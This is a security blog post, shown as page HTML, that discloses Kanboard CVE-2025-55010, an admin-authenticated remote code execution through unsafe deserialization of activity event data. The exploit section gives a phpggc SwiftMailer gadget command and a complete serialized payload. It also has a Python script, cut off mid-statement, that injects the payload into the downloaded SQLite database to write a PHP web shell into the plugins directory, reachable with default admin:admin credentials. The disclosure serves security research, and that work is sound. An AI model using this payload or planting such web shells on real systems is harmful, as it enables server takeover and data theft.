<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Kanboard CVE-2025-55010 | Bryan’s Blog</title>
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="Kanboard CVE-2025-55010" />
<meta name="author" content="Bryan Lynch" />
<meta property="og:locale" content="en_US" />
<link rel="canonical" href="http://localhost:4000/posts/kanboard_rce.html" />
<meta property="og:url" content="http://localhost:4000/posts/kanboard_rce.html" />
<meta property="og:site_name" content="Bryan’s Blog" />
<meta property="og:type" content="website" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Kanboard CVE-2025-55010" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"WebPage","author":{"@type":"Person","name":"Bryan Lynch"},"headline":"Kanboard CVE-2025-55010","url":"http://localhost:4000/posts/kanboard_rce.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Bryan&apos;s Blog" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">Bryan&#39;s Blog</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger">
            <a class="page-link" href="/">Home</a>
						<div class="dropdown" style="display: inline-block; position: relative;">

	<div class="dropdown" style="position: relative; display: inline-block;">
  <span style="cursor: pointer; padding: 0.5em;" class="dropdown-label">
    CVE Reports ▾
  </span>
  <div class="dropdown-content" style="
    display: none;
    position: absolute;
    background-color: white;
    box-shadow: 0 2px 6px rgba(0,0,0,0.15);
    z-index: 999;
    min-width: 200px;
    text-align: left;
  ">
    <a href="/posts/elabftw_sqli.html" style="
          display: block;
          padding: 0.5em 1em;
          color: black;
          text-decoration: none;
          white-space: nowrap;
        ">Elabftw CVE-2025-25206</a>
      
    
    <a href="/posts/kanboard_password.html" style="
          display: block;
          padding: 0.5em 1em;
          color: black;
          text-decoration: none;
          white-space: nowrap;
        ">Kanboard CVE-2025-52560</a>
      
    <a href="/posts/kanboard_rce.html" style="
          display: block;
          padding: 0.5em 1em;
          color: black;
          text-decoration: none;
          white-space: nowrap;
        ">Kanboard CVE-2025-55010</a>
      
    <a href="/posts/kanboard_tasks.html" style="
          display: block;
          padding: 0.5em 1em;
          color: black;
          text-decoration: none;
          white-space: nowrap;
        ">Kanboard CVE-2025-55011</a>
      
    <a href="/posts/kanboard_users.html" style="
          display: block;
          padding: 0.5em 1em;
          color: black;
          text-decoration: none;
          white-space: nowrap;
        ">Kanboard CVE-2025-52575</a>
      
    
    
    
    
  </div>
</div>

<style>
  .dropdown:hover .dropdown-content {
    display: block !important;
  }
</style>

            <a class="page-link" href="/posts/oswe.html">OSWE</a>
           <a class="page-link" href="/posts/about.html">About Me</a>
        </div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Kanboard CVE-2025-55010</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="" itemprop="datePublished">
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <style>
pre {
  margin-top: 1.5em;   /* space above */
  margin-bottom: 1.5em !important; /* space below */
}
</style>

<h2 id="authenticated-admin-remote-code-execution-via-unsafe-deserialization">Authenticated Admin Remote Code Execution via Unsafe Deserialization</h2>

<p><a href="https://github.com/kanboard/kanboard/">Kanboard</a>, like many other apps, uses <code class="language-plaintext highlighter-rouge">admin:admin</code> as its default admin login credentials. While this is convenient for installing and testing the app, it also leaves open the possibly that a lazy sysadmin could forget to change the password. Given that the codebase has almost 10k stars, it’s not unthinkable that there could be hundreds of instances of Kanboard in the wild using default creds.</p>

<p>With this in mind, I decided to do a little experiment.  If a hacker were to login as admin with these creds, how far could they get?  Would it be easy to plant a shell on the system, or are there checks in place to prevent such things from happening?</p>

<p>As it turns out, Kanboard is fairly robust at preventing direct code execution.  My first thought was that since the app allows plugin installation, an attacker could just write a malicious plugin, install it, and execute arbitrary php. However, I discovered that plugins are disabled by default, and can only be enabled from the command line, which an attacker would not have access to.</p>

<figure style="text-align: center; margin: 2em 0;">
  <img src="/assets/img/kanboard/kb_plugins_disabled.png" alt="Password Reset" style="display: block; margin-left: auto; margin-right: auto; max-width: 90%; border-radius: 8px;" />
</figure>

<p>For my next vector, I considered database upload. Kanboard by default stores all of its data in SQLite, and admins have the ability to both upload and download the database.</p>

<figure style="text-align: center; margin: 2em 0;">
  <img src="/assets/img/kanboard/kb_db_upload.png" alt="Password Reset" style="display: block; margin-left: auto; margin-right: auto; max-width: 90%; border-radius: 8px;" />
</figure>

<p>But even here, there were limited options. All of the critical functionality of Kanboard seems to come from the ENV args in the Docker container, none of which are stored in the DB.</p>

<p>With the “low-hanging fruit” out of the way, I decided to dive deeper into the codebase, turning my attention to dangerous method calls.</p>

<h3 id="identifying-the-vulnerability">Identifying the Vulnerability</h3>

<p>After running a search for dangerous method calls, there was a line in the <code class="language-plaintext highlighter-rouge">ProjectActivityEventFormatter</code> that caught my eye.</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cd">/**
 * Decode event data, supports unserialize() and json_decode()
 *
 * @access protected
 * @param  string   $data   Serialized data
 * @return array
 */</span>
<span class="k">protected</span> <span class="k">function</span> <span class="n">unserializeEvent</span><span class="p">(</span><span class="nv">$data</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="nv">$data</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">===</span> <span class="s1">'a'</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="nb">unserialize</span><span class="p">(</span><span class="nv">$data</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="nb">json_decode</span><span class="p">(</span><span class="nv">$data</span><span class="p">,</span> <span class="kc">true</span><span class="p">)</span> <span class="o">?:</span> <span class="k">array</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If the <code class="language-plaintext highlighter-rouge">event-&gt;data</code> field starts with the letter <code class="language-plaintext highlighter-rouge">a</code>, the app will blindly deserialize the object and return it. By default, this field is likely an array or associative array that has been serialized into a PHP object, and the creator of the method probably never assumed that it could be used for malicious purposes.</p>

<p>I then traced the <code class="language-plaintext highlighter-rouge">unserializeEvent</code> function and found that it was being called within the <code class="language-plaintext highlighter-rouge">format</code> method.</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">public</span> <span class="k">function</span> <span class="n">format</span><span class="p">()</span>
<span class="p">{</span>
    <span class="nv">$events</span> <span class="o">=</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="n">query</span><span class="o">-&gt;</span><span class="nf">findAll</span><span class="p">();</span>
    <span class="nv">$res</span> <span class="o">=</span> <span class="k">array</span><span class="p">();</span>

    <span class="k">foreach</span> <span class="p">(</span><span class="nv">$events</span> <span class="k">as</span> <span class="o">&amp;</span><span class="nv">$event</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$event</span> <span class="o">+=</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="nf">unserializeEvent</span><span class="p">(</span><span class="nv">$event</span><span class="p">[</span><span class="s1">'data'</span><span class="p">]);</span>
        <span class="k">unset</span><span class="p">(</span><span class="nv">$event</span><span class="p">[</span><span class="s1">'data'</span><span class="p">]);</span>
</code></pre></div></div>

<p>So there we have it.  The events are being read from the DB and their <code class="language-plaintext highlighter-rouge">data</code> field is being passed into <code class="language-plaintext highlighter-rouge">unserializeEvent</code>. This is where the part about admins being able to upload / download the DB is so important. A malicious admin could update the <code class="language-plaintext highlighter-rouge">data</code> column of an event to any arbitrary serialized object (as long as it starts with an a:) and the app will blindly deserialize it.</p>

<h3 id="exploiting">Exploiting</h3>
<h4 id="finding-a-proper-gadget">Finding a Proper Gadget</h4>
<p>PHP is a little different than languages like JAVA, where you could serialize a method call and ensure remote code execution.  Just getting an object unserialized is not enough to get RCE.  An attacker needs to upload a gadget that will somehow be triggered through a method call within the app itself.  With that in mind, I decided to look at potential paths for execution.</p>

<p>Kanboard is a small, self-contained app, and therefore does not contain many libraries suitable for gadget use. However, I did find that it included <code class="language-plaintext highlighter-rouge">SwiftMailer</code>, which I’ve seen abused in other gadget exploits, so I decided to follow that path.</p>

<p>Rather than writing my own gadget chain from scratch, I entailed the help of the PHP general gadget chain tool <code class="language-plaintext highlighter-rouge">phpggc</code> to look for possiblities.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>└─$ phpggc -l | grep -i swift

SwiftMailer/FD1   -5.4.12+, -6.2.1+    File delete        __destruct
SwiftMailer/FD2   5.4.6 &lt;= 5.x-dev     File delete        __destruct     *
SwiftMailer/FR1   6.0.0 &lt;= 6.3.0       File read          __toString
SwiftMailer/FW1   5.1.0 &lt;= 5.4.8       File write         __toString
SwiftMailer/FW2   6.0.0 &lt;= 6.0.1       File write         __toString
SwiftMailer/FW3   5.0.1                File write         __toString
SwiftMailer/FW4   4.0.0 &lt;= ?           File write         __destruct
</code></pre></div></div>

<p>While I couldn’t find the exact version of SwiftMailer the app was using, I gauged it to be around <code class="language-plaintext highlighter-rouge">5.4.5</code>, which matched up with the <code class="language-plaintext highlighter-rouge">SwiftMailer/FW1</code> gadget.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SwiftMailer/FW1     5.1.0 &lt;= 5.4.8     File write     __toString
</code></pre></div></div>

<p>For those not familiar, this gadget will give me arbitrary file write on the system, but only when triggered by a <code class="language-plaintext highlighter-rouge">toString</code> call. I then set off to find instances in the app where <code class="language-plaintext highlighter-rouge">event-&gt;data</code> might be passed into a method that calls <code class="language-plaintext highlighter-rouge">toString</code>.</p>

<p>After scouring across event-related views and templates, I came across the following in <code class="language-plaintext highlighter-rouge">comment_create.php</code></p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;p</span> <span class="na">class=</span><span class="s">"activity-title"</span><span class="nt">&gt;</span>
    <span class="cp">&lt;?= e('%s commented the task %s',
            $this-&gt;text-&gt;e($author),
            $this-&gt;url-&gt;link(t('#%d', $task['id']), 'TaskViewController', 'show', array('task_id' =&gt; $task['id']))
        ) ?&gt;</span>
    <span class="nt">&lt;small</span> <span class="na">class=</span><span class="s">"activity-date"</span><span class="nt">&gt;</span><span class="cp">&lt;?= $this-&gt;dt-&gt;datetime($date_creation) ?&gt;</span><span class="nt">&lt;/small&gt;</span>
<span class="nt">&lt;/p&gt;</span>
<span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"activity-description"</span><span class="nt">&gt;</span>
    <span class="nt">&lt;p</span> <span class="na">class=</span><span class="s">"activity-task-title"</span><span class="nt">&gt;</span><span class="cp">&lt;?= $this-&gt;text-&gt;e($task['title']) ?&gt;</span><span class="nt">&lt;/p&gt;</span>
    <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"markdown"</span><span class="nt">&gt;</span><span class="cp">&lt;?= $this-&gt;text-&gt;markdown($comment['comment']) ?&gt;</span><span class="nt">&lt;/div&gt;</span>
<span class="nt">&lt;/div&gt;</span>
</code></pre></div></div>

<p>Notice the second to last line</p>
<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"markdown"</span><span class="nt">&gt;</span><span class="cp">&lt;?= $this-&gt;text-&gt;markdown($comment['comment']) ?&gt;</span><span class="nt">&lt;/div&gt;</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">comment['comment']</code> field is being passed into a markdown parser, which is likely expecting a string parameter, meaning that <code class="language-plaintext highlighter-rouge">toString</code> will be called on the object passed as a parameter!  This is just the invocation we need to trigger our gadget.</p>

<p>The basic gameplan now becomes clear.</p>

<ol>
  <li>Create a new <code class="language-plaintext highlighter-rouge">event</code> in the DB and change its name to <code class="language-plaintext highlighter-rouge">comment-create</code>.</li>
  <li>Inside the <code class="language-plaintext highlighter-rouge">data</code> field, serialize a <code class="language-plaintext highlighter-rouge">Comment</code> object like the following:
    <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span>
 <span class="s2">"id"</span><span class="o">:</span> <span class="mi">1</span><span class="p">,</span>
 <span class="s2">"timestamp"</span><span class="o">:</span> <span class="mi">12341234132</span><span class="p">,</span>
 <span class="s2">"comment"</span><span class="o">:</span> <span class="p">{</span>
     <span class="s2">"id"</span><span class="o">:</span> <span class="mi">1</span>
     <span class="s2">"title"</span><span class="o">:</span> <span class="s2">"test"</span>
     <span class="s2">"comment"</span><span class="o">:</span> <span class="o">&lt;</span><span class="n">gadget</span><span class="o">&gt;</span><span class="p">,</span>
     <span class="mf">...</span>
 <span class="p">}</span>
<span class="p">}</span>
</code></pre></div>    </div>
  </li>
  <li>Upload the DB.</li>
  <li>Visit the project activities page to trigger our gadget via Markdown.</li>
</ol>

<h4 id="planting-the-seed">Planting the Seed</h4>
<p>With the basic plan of attack underway, we now need to figure out where to place our arbitrary file write so that we have execution access to whatever we upload. In the docker configuration, Kanboard runs as the <code class="language-plaintext highlighter-rouge">nginx</code> user.  Inside the app directory, there are only two folders writable to the <code class="language-plaintext highlighter-rouge">nginx</code> user, <code class="language-plaintext highlighter-rouge">/data</code> and <code class="language-plaintext highlighter-rouge">/plugins</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>088f12e8a701:/var/www/app# ls -al
total 92
drwxr-xr-x    1 root     root          4096 Jun 22 21:26 .
drwxr-xr-x    1 root     root          4096 Jun 22 21:26 ..
drwxr-xr-x    2 root     root          4096 Jun 22 21:26 .devcontainer
-rw-r--r--    1 root     root          1080 Jun 22 21:26 LICENSE
drwxr-xr-x    1 root     root          4096 Jun 22 21:26 app
drwxr-xr-x    6 root     root          4096 Jun 22 21:26 assets
-rwxr-xr-x    1 root     root           582 Jun 22 21:26 cli
-rw-r--r--    1 root     root         10173 Jun 22 21:26 config.default.php
-rw-r--r--    1 root     root           133 Jun 22 21:26 config.php
drwxr-xr-x    2 nginx    nginx         4096 Aug 13 07:13 data
-rw-r--r--    1 root     root         13094 Jun 22 21:26 favicon.ico
-rw-r--r--    1 root     root           587 Jun 22 21:26 healthcheck.php
-rw-r--r--    1 root     root           309 Jun 22 21:26 index.php
-rw-r--r--    1 root     root            78 Jun 22 21:26 jsonrpc.php
drwxr-xr-x   14 root     root          4096 Jun 22 21:26 libs
drwxr-xr-x    2 nginx    nginx         4096 Jun 22 21:26 plugins
-rw-r--r--    1 root     root            25 Jun 22 21:26 robots.txt
drwxr-xr-x    7 root     root          4096 Jun 22 21:26 vendor
</code></pre></div></div>

<p>Looking at the <code class="language-plaintext highlighter-rouge">nginx.conf</code>,</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>location ~ \.php$ {
    try_files $uri =404;
    fastcgi_split_path_info ^(.+\.php)(/.+)$;
    fastcgi_pass unix:/var/run/php-fpm.sock;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    fastcgi_index index.php;
    include fastcgi_params;
    fastcgi_param SERVER_NAME $host;
    fastcgi_param HTTP_X_REAL_IP $remote_addr;
    fastcgi_param HTTP_X_FORWARDED_FOR $proxy_add_x_forwarded_for;
}

location ~ /data {
    return 404;
}
</code></pre></div></div>

<p>we can see that the <code class="language-plaintext highlighter-rouge">/data</code> directory forbids any execution (likely to stop user file uploads from executing). But lucky for us, we still have the <code class="language-plaintext highlighter-rouge">/plugins</code> directory which allows for full php script execution!</p>

<p>Given this info, I decided the point of attack would be to write a simple php reverse shell file into <code class="language-plaintext highlighter-rouge">/var/www/app/plugins/test.php</code>.</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span> <span class="nb">system</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'x'</span><span class="p">]);</span> <span class="cp">?&gt;</span>
</code></pre></div></div>

<p>To accomplish this, an attacker can generate a gadget using the <code class="language-plaintext highlighter-rouge">phpggc</code> method from earlier</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>phpggc SwiftMailer/FW1 /var/www/app/plugins/test.php /home/kali/bounty/kanboard/payload.php &gt; payload.txt
</code></pre></div></div>

<p>Now all that’s left is to create a serialized associative array object and paste the output from <code class="language-plaintext highlighter-rouge">phpggc</code> into the <code class="language-plaintext highlighter-rouge">comment</code> field. This ended up being the final object that I used:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>a:6:{s:7:"comment";a:2:{s:7:"comment";O:13:"Swift_Message":8:{s:37:"Swift_Mime_SimpleMimeEntity_headers";O:26:"Swift_Mime_SimpleHeaderSet":1:{s:36:"Swift_Mime_SimpleHeaderSet_factory";O:30:"Swift_Mime_SimpleHeaderFactory":3:{s:40:"Swift_Mime_SimpleHeaderFactory_encoder";O:44:"Swift_Mime_HeaderEncoder_Base64HeaderEncoder":0:{}s:45:"Swift_Mime_SimpleHeaderFactory_paramEncoder";O:44:"Swift_Mime_HeaderEncoder_Base64HeaderEncoder":0:{}s:40:"Swift_Mime_SimpleHeaderFactory_grammar";O:18:"Swift_Mime_Grammar":0:{}}}s:34:"Swift_Mime_SimpleMimeEntity_body";s:28:"&lt;?php system($_GET['x']); ?&gt;";s:37:"Swift_Mime_SimpleMimeEntity_encoder";O:43:"Swift_Mime_ContentEncoder_RawContentEncoder":0:{}s:35:"Swift_Mime_SimpleMimeEntity_cache";O:28:"Swift_KeyCache_ArrayKeyCache":2:{s:39:"Swift_KeyCache_ArrayKeyCache_contents";a:0:{}s:37:"Swift_KeyCache_ArrayKeyCache_stream";O:40:"Swift_KeyCache_SimpleKeyCacheInputStream":4:{s:51:"Swift_KeyCache_SimpleKeyCacheInputStream_keyCache";O:28:"Swift_KeyCache_ArrayKeyCache":2:{s:39:"Swift_KeyCache_ArrayKeyCache_contents";a:0:{}s:37:"Swift_KeyCache_ArrayKeyCache_stream";N;}s:48:"Swift_KeyCache_SimpleKeyCacheInputStream_nsKey";s:9:"something";s:50:"Swift_KeyCache_SimpleKeyCacheInputStream_itemKey";s:9:"something";s:55:"Swift_KeyCache_SimpleKeyCacheInputStream_writeThrough";O:31:"Swift_ByteStream_FileByteStream":2:{s:38:"Swift_ByteStream_FileByteStream_path";s:29:"/var/www/app/plugins/test.php";s:38:"Swift_ByteStream_FileByteStream_mode";s:3:"w+b";}}}s:38:"Swift_Mime_SimpleMimeEntity_cacheKey";s:9:"something";s:28:"Swift_MessageheaderSigners";a:1:{i:0;O:29:"Swift_Signers_DomainKeySigner":2:{s:14:"*_privateKey";s:886:"-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDRpx277bhMnUSga718Dd7P7ZA+23B8kBzqie3hFklaPFL8R18w
bVjHU4VHJq1SIrkbaX9MKnuAl4y9VSruQuJtjb9k1mk1CaWgESwK0ViOx9ugoI4B
cmEToyO/gCPKAkF69r7Lfy/M0VOxXH58QURCQU3dS3pm5SP8hhy/ag8fowIDAQAB
AoGATbKBcoRHKR2fsVQ8hR0e1jBUpPbuWTuPe9xiLGj2BlsU5ioNPQVJQZXSbuwG
j8oOj/opEzErVBzWK9TEdEiVYRhcyPc6awiIulZAp928TRsP0+ZjKOTXtgU40GNf
BqdaI8oMgSjeB3mbJP9S9ghVmOEN1AArOPBrWKyIEcDq/gECQQD5C0rb1lYqN7Om
yx6gYUXW91xs40PCtNI1EVtFVkVb4B3Dsz3tmi93NxgDK+fJLcid3Yx4PF0v1pm6
ysBU2vupAkEA14IrToWxTtzcPI9852TJ4A9IA93Y7AppmWzkxp0uPM0tmRIuOpK+
foLPtdLcXE7KAtHoHnccpGSQE33clb5wawJBAOYPHXcZd/2F+UqCZudnFHoxhcr8
4nKyUWE+iF70BByMW1KWeQXOIjzxwxfi7jq1NZdHu2Sy9q6jgt3AQI3iwQkCQCy0
gP1R+H0OjdU2QsfRfZswMFU1ARm98zfzgeW9l2jfezUEs3hNFp0xz5q9Oh8f7QH2
vzsKpHNptQWGF2sszS8CQQCMZbkmUguZhj72vvJ33bbugLtjv2AjTQxwAOAZZF+3
6P1HpTADFnZQZbGAmjJNT//JEHs6+TTbb1Wjj+mJHbmR
-----END RSA PRIVATE KEY-----";s:37:"Swift_Signers_DomainKeySigner_bound";a:1:{i:0;r:13;}}}s:26:"Swift_MessagebodySigners";a:0:{}s:27:"Swift_MessagesavedMessage";a:0:{}}s:10:"visibility";i:1;}s:11:"author_name";s:4:"evil";s:15:"author_username";s:0:"";s:10:"event_name";s:14:"comment.create";s:4:"task";a:2:{s:2:"id";i:1;s:5:"title";s:4:"test";}s:13:"date_creation";i:1725000000;}                                                                                

</code></pre></div></div>

<h4 id="poc">PoC</h4>
<ol>
  <li>Login as default admin user admin:admin</li>
  <li>Create a project and a task.</li>
  <li>Download and unzip the database.</li>
  <li>Find a target row (any row will work) in the <code class="language-plaintext highlighter-rouge">project_activities</code> table and update the <code class="language-plaintext highlighter-rouge">event_name</code> field to <code class="language-plaintext highlighter-rouge">comment.create</code>.
    <figure style="text-align: center; margin: 2em 0;">
   <img src="/assets/img/kanboard/db_edit.png" alt="Password Reset" style="display: block; margin-left: auto; margin-right: auto; max-width: 90%; border-radius: 8px;" />
 </figure>
  </li>
  <li>
    <p>Use the following Python script to update the <code class="language-plaintext highlighter-rouge">data</code> column on the target row.</p>

    <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="kn">import</span> <span class="nn">sqlite3</span>

 <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'a:6:{s:7:"comment";a:2:{s:7:"comment";O:13:"Swift_Message":8:{s:37:"</span><span class="se">\x00</span><span class="s">Swift_Mime_SimpleMimeEntity</span><span class="se">\x00</span><span class="s">_headers";O:26:"Swift_Mime_SimpleHeaderSet":1:{s:36:"</span><span class="se">\x00</span><span class="s">Swift_Mime_SimpleHeaderSet</span><span class="se">\x00</span><span class="s">_factory";O:30:"Swift_Mime_SimpleHeaderFactory":3:{s:40:"</span><span class="se">\x00</span><span class="s">Swift_Mime_SimpleHeaderFactory</span><span class="se">\x00</span><span class="s">_encoder";O:44:"Swift_Mime_HeaderEncoder_Base64HeaderEncoder":0:{}s:45:"</span><span class="se">\x00</span><span class="s">Swift_Mime_SimpleHeaderFactory</span><span class="se">\x00</span><span class="s">_paramEncoder";O:44:"Swift_Mime_HeaderEncoder_Base64HeaderEncoder":0:{}s:40:"</span><span class="se">\x00</span><span class="s">Swift_Mime_SimpleHeaderFactory</span><span class="se">\x00</span><span class="s">_grammar";O:18:"Swift_Mime_Grammar":0:{}}}s:34:"</span><span class="se">\x00</span><span class="s">Swift_Mime_SimpleMimeEntity</span><span class="se">\x00</span><span class="s">_body";s:28:"&lt;?php system($_GET[</span><span class="se">\'</span><span class="s">x</span><span class="se">\'</span><span class="s">]); ?&gt;";s:37:"</span><span class="se">\x00</span><span class="s">Swift_Mime_SimpleMimeEntity</span><span class="se">\x00</span><span class="s">_encoder";O:43:"Swift_Mime_ContentEncoder_RawContentEncoder":0:{}s:35:"</span><span class="se">\x00</span><span class="s">Swift_Mime_SimpleMimeEntity</span><span class="se">\x00</span><span class="s">_cache";O:28:"Swift_KeyCache_ArrayKeyCache":2:{s:39:"</span><span class="se">\x00</span><span class="s">Swift_KeyCache_ArrayKeyCache</span><span class="se">\x00</span><span class="s">_contents";a:0:{}s:37:"</span><span class="se">\x00</span><span class="s">Swift_KeyCache_ArrayKeyCache</span><span class="se">\x00</span><span class="s">_stream";O:40:"Swift_KeyCache_SimpleKeyCacheInputStream":4:{s:51:"</span><span class="se">\x00</span><span class="s">Swift_KeyCache_SimpleKeyCacheInputStream</span><span class="se">\x00</span><span class="s">_keyCache";O:28:"Swift_KeyCache_ArrayKeyCache":2:{s:39:"</span><span class="se">\x00</span><span class="s">Swift_KeyCache_ArrayKeyCache</span><span class="se">\x00</span><span class="s">_contents";a:0:{}s:37:"</span><span class="se">\x00</span><span class="s">Swift_KeyCache_ArrayKeyCache</span><span class="se">\x00</span><span class="s">_stream";N;}s:48:"</span><span class="se">\x00</span><span class="s">Swift_KeyCache_SimpleKeyCacheInputStream</span><span class="se">\x00</span><span class="s">_nsKey";s:9:"something";s:50:"</span><span class="se">\x00</span><span class="s">Swift_KeyCache_SimpleKeyCacheInputStream</span><span class="se">\x00</span><span class="s">_itemKey";s:9:"something";s:55:"</span><span class="se">\x00</span><span class="s">Swift_KeyCache_SimpleKeyCacheInputStream</span><span class="se">\x00</span><span class="s">_writeThrough";O:31:"Swift_ByteStream_FileByteStream":2:{s:38:"</span><span class="se">\x00</span><span class="s">Swift_ByteStream_FileByteStream</span><span class="se">\x00</span><span class="s">_path";s:29:"/var/www/app/plugins/test.php";s:38:"</span><span class="se">\x00</span><span class="s">Swift_ByteStream_FileByteStream</span><span class="se">\x00</span><span class="s">_mode";s:3:"w+b";}}}s:38:"</span><span class="se">\x00</span><span class="s">Swift_Mime_SimpleMimeEntity</span><span class="se">\x00</span><span class="s">_cacheKey";s:9:"something";s:28:"</span><span class="se">\x00</span><span class="s">Swift_Message</span><span class="se">\x00</span><span class="s">headerSigners";a:1:{i:0;O:29:"Swift_Signers_DomainKeySigner":2:{s:14:"</span><span class="se">\x00</span><span class="s">*</span><span class="se">\x00</span><span class="s">_privateKey";s:886:"-----BEGIN RSA PRIVATE KEY-----</span><span class="se">\n</span><span class="s">MIICXQIBAAKBgQDRpx277bhMnUSga718Dd7P7ZA+23B8kBzqie3hFklaPFL8R18w</span><span class="se">\n</span><span class="s">bVjHU4VHJq1SIrkbaX9MKnuAl4y9VSruQuJtjb9k1mk1CaWgESwK0ViOx9ugoI4B</span><span class="se">\n</span><span class="s">cmEToyO/gCPKAkF69r7Lfy/M0VOxXH58QURCQU3dS3pm5SP8hhy/ag8fowIDAQAB</span><span class="se">\n</span><span class="s">AoGATbKBcoRHKR2fsVQ8hR0e1jBUpPbuWTuPe9xiLGj2BlsU5ioNPQVJQZXSbuwG</span><span class="se">\n</span><span class="s">j8oOj/opEzErVBzWK9TEdEiVYRhcyPc6awiIulZAp928TRsP0+ZjKOTXtgU40GNf</span><span class="se">\n</span><span class="s">BqdaI8oMgSjeB3mbJP9S9ghVmOEN1AArOPBrWKyIEcDq/gECQQD5C0rb1lYqN7Om</span><span class="se">\n</span><span class="s">yx6gYUXW91xs40PCtNI1EVtFVkVb4B3Dsz3tmi93NxgDK+fJLcid3Yx4PF0v1pm6</span><span class="se">\n</span><span class="s">ysBU2vupAkEA14IrToWxTtzcPI9852TJ4A9IA93Y7AppmWzkxp0uPM0tmRIuOpK+</span><span class="se">\n</span><span class="s">foLPtdLcXE7KAtHoHnccpGSQE33clb5wawJBAOYPHXcZd/2F+UqCZudnFHoxhcr8</span><span class="se">\n</span><span class="s">4nKyUWE+iF70BByMW1KWeQXOIjzxwxfi7jq1NZdHu2Sy9q6jgt3AQI3iwQkCQCy0</span><span class="se">\n</span><span class="s">gP1R+H0OjdU2QsfRfZswMFU1ARm98zfzgeW9l2jfezUEs3hNFp0xz5q9Oh8f7QH2</span><span class="se">\n</span><span class="s">vzsKpHNptQWGF2sszS8CQQCMZbkmUguZhj72vvJ33bbugLtjv2AjTQxwAOAZZF+3</span><span class="se">\n</span><span class="s">6P1HpTADFnZQZbGAmjJNT//JEHs6+TTbb1Wjj+mJHbmR</span><span class="se">\n</span><span class="s">-----END RSA PRIVATE KEY-----";s:37:"</span><span class="se">\x00</span><span class="s">Swift_Signers_DomainKeySigner</span><span class="se">\x00</span><span class="s">_bound";a:1:{i:0;r:13;}}}s:26:"</span><span class="se">\x00</span><span class="s">Swift_Message</span><span class="se">\x00</span><span class="s">bodySigners";a:0:{}s:27:"</span><span class="se">\x00</span><span class="s">Swift_Message</span><span class="se">\x00</span><span class="s">savedMessage";a:0:{}}s:10:"visibility";i:1;}s:11:"author_name";s:4:"evil";s:15:"author_username";s:0:"";s:10:"event_name";s:14:"comment.create";s:4:"task";a:2:{s:2:"id";i:1;s:5:"title";s:4:"test";}s:13:"date_creation";i:1725000000;}'</span>


 <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="s">"db.sqlite"</span><span class="p">)</span>
 <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">cursor</span><span class="p">()</span>

 <span class="n">cursor</span><span class="p">.</span><span class="n">execute</span><span class="p">(</span><span class="s">"""
     UPDATE project_activities
     SET data = ?
     WHERE rowid = ?
